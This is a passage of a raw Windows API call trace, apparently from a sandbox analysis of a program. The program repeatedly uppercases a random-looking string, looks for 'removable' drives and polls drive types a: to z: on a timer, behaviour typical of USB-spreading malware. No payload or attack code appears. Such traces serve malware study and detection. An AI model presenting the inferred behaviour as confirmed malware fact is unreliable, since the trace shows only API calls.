[0215.588] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.588] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.588] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.588] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.588] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.589] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.589] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.589] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.589] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.590] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.591] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.592] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.592] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.592] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.592] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.592] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.594] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.594] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.595] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.595] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.596] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.597] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.597] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.597] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.597] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0215.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0215.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.599] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.599] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.599] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.599] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.600] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.600] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.600] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.600] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.601] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.601] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.602] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.603] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.604] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.604] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.604] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.605] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0215.605] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0215.605] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.606] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.606] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.606] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.606] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.606] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.606] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.607] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.607] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.607] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.607] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.607] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.608] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.609] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.610] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.611] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.611] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0215.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0215.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0215.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0215.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 